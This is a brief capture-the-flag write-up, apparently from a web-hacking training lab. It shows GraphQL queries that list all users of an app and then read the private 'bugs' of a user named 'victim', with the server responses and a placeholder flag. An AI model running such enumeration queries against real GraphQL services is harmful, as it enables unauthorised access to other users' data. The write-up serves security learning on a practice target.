Flag 0
Not much to explain about this one, just go digging around the database using the
GraphQL query structure presented.
{
allUsers {
edges {
node {
id,
username
}
}
}
}
{
"data": {
"allUsers": {
"edges": [
{
"node": {
"id": "VXNlcnM6MQ==",
"username": "admin"
}
},
{
"node": {
"id": "VXNlcnM6Mg==",
"username": "victim"
}
}
]
}
}
}
{
findUser(username: "victim") {
bugs {
edges {
node {
text
}
}
}
}
}
{
"data": {
"findUser": {
"bugs": {
"edges": [
{
"node": {
"text": "^FLAG^{flag}$FLAG$"
}
}
]
}
}
}
}